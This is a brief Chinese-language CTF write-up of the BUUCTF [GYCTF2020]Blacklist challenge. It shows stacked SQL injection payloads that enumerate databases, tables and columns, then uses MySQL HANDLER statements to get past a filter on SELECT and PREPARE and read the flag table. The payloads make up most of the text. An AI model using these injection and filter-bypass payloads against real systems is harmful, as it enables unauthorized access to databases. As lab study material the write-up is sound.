9.3 BUUCTF [GYCTF2020]Blacklist

手工SQL注入
?inject=1'后有报错 且发现过滤掉了 update select 等关键词
所以只能堆叠注入

?inject=1';show databases;-- -

?inject=1';show tables;-- -

注意查询columns用from的时候 后面的table名一定用 `` 括起来！

?inject=1';show columns from `FlagHere`;-- -

最后查询 flag的时候因为select被过滤了 prepare也被过滤了 所以直接选择和预编译都不能用
新姿势：

HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere COLSE;

所以构造

?inject=1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;-- -